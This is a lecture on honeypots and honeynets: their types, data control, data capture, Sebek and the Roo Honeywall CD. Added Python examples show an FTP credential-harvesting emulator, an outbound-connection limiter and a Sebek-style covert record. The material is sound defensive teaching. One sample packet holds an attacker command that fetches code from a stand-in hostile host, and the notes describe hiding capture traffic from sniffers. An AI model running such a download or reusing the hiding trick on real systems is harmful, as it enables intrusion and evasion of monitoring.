Honeypots and Honeynets
Source: The HoneyNet Project http://www.honeynet.org/
Mehedi Masud
September 19, 2007, Lecture #12
Why Honeypots
A great deal of the security profession and the IT world depend on honeypots. Honeypots are used to:
◦ Build anti-virus signatures.
◦ Build spam signatures and filters.
◦ Help ISPs identify compromised systems.
◦ Assist law enforcement in tracking criminals.
◦ Hunt and shut down botnets.
◦ Collect malware for analysis.
What are Honeypots
Honeypots are real or emulated vulnerable systems ready to be attacked.
The primary value of a honeypot is to collect information.
This information is used to better identify, understand and protect against threats.
By themselves, honeypots add little direct value to protecting your network; their value is the intelligence they produce.
Types of Honeypot (by role)
◦ Server: put the honeypot on the Internet and let the bad guys come to you.
◦ Client: the honeypot initiates the connection and interacts with servers (for example, an instrumented browser that visits suspect websites).
◦ Other: proxies.
Types of Honeypot (by level of interaction)
Low-interaction
◦ Emulates services, applications, and OSs.
◦ Low risk and easy to deploy/maintain, but captures limited information: the attacker only gets as far as the emulation allows.
High-interaction
◦ Real services, applications, and OSs.
◦ Captures extensive information, but high risk and time-intensive to maintain: the attacker gets a real system to compromise, so it must be contained.
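The following is an added example, not code from the lecture or from the Honeynet Project, of what "emulates a service" means in practice: a low-interaction honeypot that speaks just enough FTP to harvest the usernames, passwords and commands an attacker sends, and refuses everything else. The banner text, the listening port 2121 and the tiny command set are assumptions chosen for illustration. The point to notice is the `502` branch: anything outside the emulation yields no further information, which is exactly the trade-off the slide describes.

```python
"""Minimal low-interaction honeypot: an emulated FTP login front-end.

Added example (not from the lecture). It emulates just enough of FTP
to capture what attackers send (usernames, passwords, commands) while
never giving them a real session. The command set is deliberately tiny,
which is the limitation of low-interaction honeypots: anything outside
the emulation gets a canned refusal and yields no more information.
"""
import socketserver
import time


class EmulatedFTP:
    """State machine for one attacker session (hypothetical, minimal)."""

    BANNER = b"220 (vsFTPd 2.0.5)\r\n"   # assumed banner text, constructed

    def __init__(self, peer="0.0.0.0"):
        self.peer = peer
        self.user = None
        self.events = []           # captured (time, peer, kind, detail)

    def _log(self, kind, detail):
        self.events.append((time.time(), self.peer, kind, detail))

    def handle(self, line: bytes) -> bytes:
        """Return the emulated server reply for one client line."""
        text = line.rstrip(b"\r\n").decode("latin-1", "replace")
        cmd, _, arg = text.partition(" ")
        cmd = cmd.upper()
        self._log("cmd", text)
        if cmd == "USER":
            self.user = arg
            return b"331 Please specify the password.\r\n"
        if cmd == "PASS":
            # Always refuse: we only want the credential, never a session.
            self._log("login", {"user": self.user, "password": arg})
            return b"530 Login incorrect.\r\n"
        if cmd == "QUIT":
            return b"221 Goodbye.\r\n"
        if cmd == "SYST":
            return b"215 UNIX Type: L8\r\n"
        # Everything else is outside the emulation: this is the
        # information boundary of a low-interaction honeypot.
        return b"502 Command not implemented.\r\n"

    def credentials(self):
        """Credential pairs captured so far in this session."""
        return [e[3] for e in self.events if e[2] == "login"]


class _Handler(socketserver.StreamRequestHandler):
    def handle(self):
        session = EmulatedFTP(self.client_address[0])
        self.wfile.write(EmulatedFTP.BANNER)
        for line in self.rfile:
            self.wfile.write(session.handle(line))
            if line.upper().startswith(b"QUIT"):
                break
        for ev in session.events:          # in production: ship to a collector
            print(ev)


def serve(host="127.0.0.1", port=2121):
    """Run the emulator; a high port is used so no privileges are needed."""
    with socketserver.ThreadingTCPServer((host, port), _Handler) as srv:
        srv.serve_forever()


if __name__ == "__main__":
    serve()
```

Run it and connect with any FTP client or `nc 127.0.0.1 2121`; every line the client sends ends up in `session.events`, but a `SITE EXEC`, `STOR` or anything else the emulator does not model is refused, so you learn what the attacker tried, not what they would have done next.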
Examples of Honeypots
Low interaction: BackOfficer Friendly, KFSensor, Honeyd
High interaction: Honeynets
Honeynets
A high-interaction honeypot designed to capture in-depth information.
The information has different value to different organizations.
A honeynet is an architecture you populate with live systems, not a product or software.
Because a honeynet has no production purpose, any traffic entering or leaving it is suspect.
How It Works
A highly controlled network where every packet entering or leaving is monitored, captured, and analyzed. Three requirements:
◦ Data Control
◦ Data Capture
◦ Data Analysis
Honeynet Architecture (diagram)
Data Control
• Mitigate the risk of the honeynet being used to harm non-honeynet systems.
• Count outbound connections and limit how many each honeypot may open per unit time.
• IPS (Snort-Inline) to drop or rewrite known attacks leaving the honeynet.
• Bandwidth throttling.
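The "count outbound connections" control, as an added example that is not the Honeynet Project's own rc.firewall: inbound traffic is never restricted (attackers must be able to reach the honeypots), while each honeypot may open only a limited number of new outbound connections per protocol per sliding hour. The honeypot addresses, the per-protocol limits and the sample event stream are all constructed for illustration.

```python
"""Honeywall-style data control: per-honeypot outbound connection limits.

Added example (not the Honeynet Project's rc.firewall). Inbound traffic
to the honeypots is never restricted, honeypot-to-honeypot traffic stays
inside the honeynet, and each honeypot may open only a limited number of
NEW outbound connections per protocol per sliding window. The limits are
assumed values chosen for illustration.
"""
from collections import defaultdict, deque

HONEYPOTS = {"10.0.0.10", "10.0.0.11"}                     # constructed
WINDOW = 3600                                              # seconds
LIMITS = {"tcp": 20, "udp": 20, "icmp": 50, "other": 10}   # assumed


class OutboundLimiter:
    def __init__(self, honeypots=HONEYPOTS, limits=LIMITS, window=WINDOW):
        self.honeypots = set(honeypots)
        self.limits = dict(limits)
        self.window = window
        # (honeypot, proto) -> timestamps of allowed outbound connections
        self.history = defaultdict(deque)

    def decide(self, ts, src, dst, proto):
        """Return 'allow' or 'drop' for a NEW connection seen at time ts."""
        proto = proto if proto in self.limits else "other"
        if src not in self.honeypots:
            return "allow"              # inbound or transit: never limited
        if dst in self.honeypots:
            return "allow"              # honeypot-to-honeypot stays inside
        q = self.history[(src, proto)]
        while q and ts - q[0] >= self.window:   # expire entries outside window
            q.popleft()
        if len(q) >= self.limits[proto]:
            return "drop"               # quota exhausted: contain the box
        q.append(ts)
        return "allow"

    def run(self, events):
        """events: iterable of (ts, src, dst, proto). Returns decisions."""
        return [(e, self.decide(*e)) for e in events]


# Constructed sample: attacker 203.0.113.5 breaks in, then the honeypot
# starts scanning 192.0.2.0/24, which is what a compromised box does.
SAMPLE = [(0, "203.0.113.5", "10.0.0.10", "tcp")]
SAMPLE += [(60 + i, "10.0.0.10", f"192.0.2.{i}", "tcp") for i in range(25)]
SAMPLE += [(120, "10.0.0.11", "192.0.2.99", "tcp"),
           (4000, "10.0.0.10", "192.0.2.200", "tcp")]   # window has rolled over


def summarize(events=SAMPLE):
    """Count allow/drop decisions per source for an event stream."""
    out = defaultdict(lambda: {"allow": 0, "drop": 0})
    for (ts, src, dst, proto), verdict in OutboundLimiter().run(events):
        out[src][verdict] += 1
    return dict(out)


if __name__ == "__main__":
    for src, counts in summarize().items():
        print(src, counts)
```

The attacker's inbound connection and the other honeypot's single outbound connection are allowed; the scanning honeypot gets its first 20 TCP connections out (enough to see what it is trying to do) and the rest are dropped until the window rolls over. On a real Honeywall the same policy is expressed as iptables rules with Snort-Inline sitting on the bridge, and the limits are a tuning decision: too low and the attacker notices and leaves, too high and you have built an attack platform.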
No Data Control (diagram): Internet <-- No Restrictions --> Honeypot, Honeypot
Without a control layer a compromised honeypot can reach anything, in either direction, without limit.
Data Control (diagram): Internet <-- Connections Limited, Packets Scrubbed --> Honeywall <-- No Restrictions --> Honeypot, Honeypot
Inbound traffic is unrestricted so attackers can reach the honeypots; outbound traffic passes through the Honeywall, which limits connections and scrubs packets.
Data Capture
Capture all activity at a variety of levels:
◦ Network activity.
◦ Application activity.
◦ System activity.
Sebek
A hidden kernel module that captures all host activity (for example, keystrokes and the data returned by read(), even in sessions that are encrypted on the wire).
It dumps the captured activity to the network.
The attacker cannot sniff the Sebek traffic: the module hides packets matching its magic number and destination port from the honeypot's own network stack, so a sniffer run on the honeypot never sees them.
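The two halves of that design, as an added example that is not Sebek's own code: the honeypot-side module emits what it saw in read() as UDP records tagged with a magic number, and a sniffer on the honeypot has records matching magic number and destination port filtered out while the Honeywall's collector keeps them. The record layout, the magic value 0xD0D0D0D0 and port 1101 are assumptions chosen for illustration, not Sebek's real wire format; the packet list is constructed.

```python
"""Sebek-style covert capture record and the 'hide by magic + dst port' rule.

Added example (not Sebek's own code). The field layout below is an
assumption chosen for illustration, not Sebek's real wire format. It
shows the two halves of the design: the honeypot-side module emits
captured read() data as UDP records tagged with a magic number, and a
sniffer run on the honeypot has those records hidden, while the
Honeywall's collector parses and keeps them.
"""
import struct

MAGIC = 0xD0D0D0D0          # assumed; configured per honeynet
SEBEK_PORT = 1101           # assumed destination UDP port
# magic, version, type, pid, uid, fd, command (12 bytes), data length
HDR = struct.Struct("!IHHIIi12sI")
TYPE_READ, TYPE_SOCKET = 0, 1


def pack_record(pid, uid, fd, command, data, rtype=TYPE_READ, version=3):
    """Build one record from data the kernel module saw in a read() call."""
    cmd = command.encode()[:12].ljust(12, b"\0")
    return HDR.pack(MAGIC, version, rtype, pid, uid, fd, cmd, len(data)) + data


def unpack_record(payload):
    """Parse a record; returns a dict, or None if it is not one of ours."""
    if len(payload) < HDR.size:
        return None
    magic, version, rtype, pid, uid, fd, cmd, length = HDR.unpack_from(payload)
    if magic != MAGIC:
        return None
    data = payload[HDR.size:HDR.size + length]
    return {"version": version, "type": rtype, "pid": pid, "uid": uid,
            "fd": fd, "command": cmd.rstrip(b"\0").decode(), "data": data}


def is_sebek(udp_dst_port, payload):
    """The hiding rule: magic number AND destination port must both match."""
    return (udp_dst_port == SEBEK_PORT and len(payload) >= 4
            and struct.unpack_from("!I", payload)[0] == MAGIC)


def honeypot_sniffer_view(packets):
    """What tcpdump run by the attacker ON the honeypot would see."""
    return [p for p in packets if not is_sebek(p[0], p[1])]


def honeywall_collector_view(packets):
    """What the Honeywall's collector keeps: parsed records only."""
    out = []
    for port, payload in packets:
        if is_sebek(port, payload):
            rec = unpack_record(payload)
            if rec:
                out.append(rec)
    return out


# Constructed traffic on the honeynet: (udp_dst_port, payload)
PACKETS = [
    (53, b"\x12\x34\x01\x00" + b"\x00" * 8),                # ordinary DNS query
    (SEBEK_PORT, pack_record(4242, 0, 0, "bash", b"wget http://evil.example/x\n")),
    (SEBEK_PORT, b"\xd0\xd0\xd0\xd0"),                      # magic, but truncated
    (SEBEK_PORT + 1, pack_record(4242, 0, 0, "bash", b"id\n")),  # right magic, wrong port
]


if __name__ == "__main__":
    print("attacker sees", len(honeypot_sniffer_view(PACKETS)), "packets")
    for r in honeywall_collector_view(PACKETS):
        print(r)
```

Both conditions matter: filtering on the magic number alone would let an attacker who guesses it hide their own traffic from the Honeywall, and filtering on the port alone would hide unrelated UDP traffic and tip off an attacker who notices the gap. Because the capture happens at the read() syscall, the `wget` line is recorded even if it was typed over SSH, which is what makes Sebek useful where network capture alone is blind.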
Sebek Architecture (diagram)
Honeywall CDROM
An attempt to combine all requirements of a Honeywall onto a single, bootable CDROM.
May 2003: released Eeyore
May 2005: released Roo
Roo Honeywall CDROM
◦ Based on Fedora Core 3.
◦ Vastly improved hardware and international support.
◦ Automated, headless installation.
◦ New Walleye interface for web-based administration and data analysis.
◦ Automated system updating.
Installation
Just insert the CDROM and boot; it installs to the local hard drive.
After it reboots for the first time, it runs a hardening script based on NIST and CIS security standards. The Honeywall is the one host in the honeynet that must not be compromised, so it is hardened and operates as a transparent layer-2 bridge with a separate management interface.
Following installation, you get a command prompt and the system is ready to configure.
Further Information
http://www.honeynet.org/
http://www.honeynet.org/book